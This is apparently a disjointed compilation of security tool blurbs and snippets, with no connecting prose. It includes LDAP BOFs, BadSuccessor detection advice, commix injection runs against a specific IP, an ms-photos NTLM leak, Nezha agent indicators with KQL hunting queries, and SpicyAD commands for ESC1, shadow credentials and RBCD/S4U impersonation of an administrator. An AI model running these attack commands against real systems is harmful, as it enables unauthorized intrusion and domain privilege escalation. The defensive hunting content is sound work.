40+ BOF commands
LDAPS support (port 636) with automatic certificate acceptance
Standard LDAP (port 389) with signing and sealing
Automatic DN/username detection for flexible targeting
Adaptix C2 integration via AxScript

git clone https://github.com/P0142/ldap-bof-collection.git
cd ldap-bof-collection
make

AxScript tab -> Script Manager -> Right click, Load New (ldap.axs)

Akamai researchers analyzed Microsoft’s patch for the vulnerability known as BadSuccessor (CVE-2025-53779) to assess its effectiveness

System access control lists (SACLs): Audit the creation of dMSAs and changes to the migration link attributes on both sides — the dMSA’s link and the superseded/preceding account’s link

Repeated log entries indicating a dMSA password has been fetched in a short window
An enabled user appearing to be linked to a dMSA (should be unusual)
A previously disabled user getting linked to a new dMSA

BloodSOCer is a 💻 Python automation tool that aggregates threat intelligence data from multiple sources (Mitre ATT&CK, Sigma rules, Atomic Red Team) and produces JSON files to ingest in BloodHound in OpenGraph format. Tool can also upload the files to BloodHound and set the icons for the custom objects if it has API Tokens defined in the configuration. Security analysts can then visualize the data from any angle, and a few Cypher queries are provided to help you get started

nxc smb dc.domain.local  -d domain.local -u 'user' -p 'pass' -M check-add-computer

The OWASP Top 10 for Agentic Applications 2026 is a globally peer-reviewed framework that identifies the most critical security risks facing autonomous and agentic AI systems. Developed through extensive collaboration with more than 100 industry experts, researchers, and practitioners, the list provides practical, actionable guidance to help organizations secure AI agents that plan, act, and make decisions across complex workflows. By distilling a broad ecosystem of OWASP GenAI Security guidance into an accessible, operational format, the Top 10 equips builders, defenders, and decision-makers with a clear starting point for reducing agentic AI risks and supporting safe, trustworthy deployments

The issue lies in UseBasicParsing of Invoke-WebRequest cmdlet of Powershell. UseBasicParsing uses basic parsing, it does not evaluate any javascript code. It just reads the text and parses it

If this parameter is not provided, Invoke-WebRequest launches the Internet Explorer underneath and tries to parse the html code by actually evaluating it, using mshtml.HTMLDocumentClass

git clone https://github.com/commixproject/commix.git commix
python commix.py -h

python commix --wizard

python commix -u http://62.173.140.174:16016/ --data 'action='

python commix -u http://62.173.140.174:16016/ --data 'action=' --tamper=space2ifs

The Microsoft ms-photos URI scheme takes fileName as parameter, which can be submitted with a UNC path, leaking NTLMv2-SSP hashes one opened

If you’re a penetration tester, you know that lateral movement is becoming increasingly difficult, especially in well-defended environments. One common technique for remote command execution has been the use of DCOM objects

git clone https://github.com/the-useless-one/pywerview
cd pywerview
python3 -m venv venv
source ./venv/bin/activate
pip install -r requirements.txt
./pywerview.py --help

EVA is an AI-assisted penetration testing agent that enhances offensive security workflows by providing structured attack guidance, contextual analysis, and multi-backend AI integration

# Ollama for local endpoint (optional)
curl -fsSL https://ollama.ai/install.sh | shr

# EVA installation
git clone https://github.com/ARCANGEL0/EVA.git
cd EVA
chmod +x eva.py
./eva.py 

# Adding it to PATH to be acessible anywhere
sudo mv eva.py /usr/local/bin/eva

▪️ Built-in LDAP signing and channel binding checks
▪️ RDP command execution
▪️ certipy find integration
▪️ raisechild module: automatic forest priv esc
▪️ Dumping LSA/SAM via MSSQL
▪️ etc

sudo apt update && sudo apt install netexec

Self-hosted, lightweight server and website monitoring and O&M tool. Detection only occurs when attackers execute commands through the agent

nz.632313373[.]xyz:8008
47.79.42[.]91

8008 - Default Nezha dashboard port
443 - Common alternative (46% of deployments)
80 - Common alternative (28% of deployments)
8888 - Alternative port
18008 - Alternative port

C:\nezha\nezha-agent.exe
C:\nezha\config.yml
C:\temp\nezha-agent.exe
C:\nezha.zip

/opt/nezha/agent/nezha-agent
/opt/nezha/agent/config.yml

nezha-agent.exe
nezha-agent
nezha_agent

services.exe → nezha-agent.exe
powershell.exe → nezha-agent.exe
nezha-agent.exe → powershell.exe
nezha-agent.exe → cmd.exe
nezha-agent.exe → whoami.exe
nezha-agent.exe → systeminfo.exe
nezha-agent.exe → net.exe

nezha-agent.exe -c C:\nezha\config.yml
client_secret
NZ_SERVER
NZ_CLIENT_SECRET
NZ_TLS
nezhahq

// Hunt for Nezha agent process execution and file paths
DeviceProcessEvents
| where TimeGenerated > ago(90d)
| where FileName has_any ("nezha-agent", "nezha_agent") 
    or FolderPath has_any ("\\nezha\\", "/nezha/", "/opt/nezha/") 
    or ProcessCommandLine has_any ("client_secret", "nezhahq", "NZ_SERVER", "NZ_CLIENT_SECRET")
| project TimeGenerated, DeviceName, FileName, FolderPath, ProcessCommandLine, AccountName, InitiatingProcessFileName
| order by TimeGenerated desc

// Hunt for network connections to Nezha default ports and known infrastructure
DeviceNetworkEvents
| where TimeGenerated > ago(90d)
| where RemotePort in (8008, 8888, 18008) 
    or RemoteUrl has_any ("nezha", "nezhahq")
| project TimeGenerated, DeviceName, InitiatingProcessFileName, RemoteIP, RemotePort, RemoteUrl, ActionType
| order by TimeGenerated desc

// Hunt for Nezha configuration files and agent binaries on disk
DeviceFileEvents
| where TimeGenerated > ago(90d)
| where FileName has_any ("nezha-agent", "config.yml") 
    or FolderPath has_any ("\\nezha\\", "/opt/nezha/", "C:\\nezha")
| project TimeGenerated, DeviceName, ActionType, FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc

SpicyAD is a C# Active Directory penetration testing tool designed for authorized security assessments. It combines multiple AD attack techniques into a single, easy-to-use tool with both interactive and command-line interfaces

# 1. Enumerate vulnerable templates
.\SpicyAD.exe enum-vulns

# 2. Exploit ESC1 (auto-chains to PKINIT)
.\SpicyAD.exe esc1 /template:ESC1 /target:administrator /sid

# 1. Add shadow credential to target machine
.\SpicyAD.exe shadow-creds add /target:SERVER$ /sid

# 1. Set RBCD
.\SpicyAD.exe rbcd set /target:SERVER$ /controlled:YOURPC$

# 2. Use Rubeus for S4U
Rubeus.exe s4u /user:YOURPC$ /rc4:<hash> /impersonateuser:administrator /msdsspn:cifs/SERVER.evilcorp.net /ptt

# 3. Access target
dir \\SERVER\C$

# 4. Cleanup
.\SpicyAD.exe rbcd clear /target:SERVER$ /force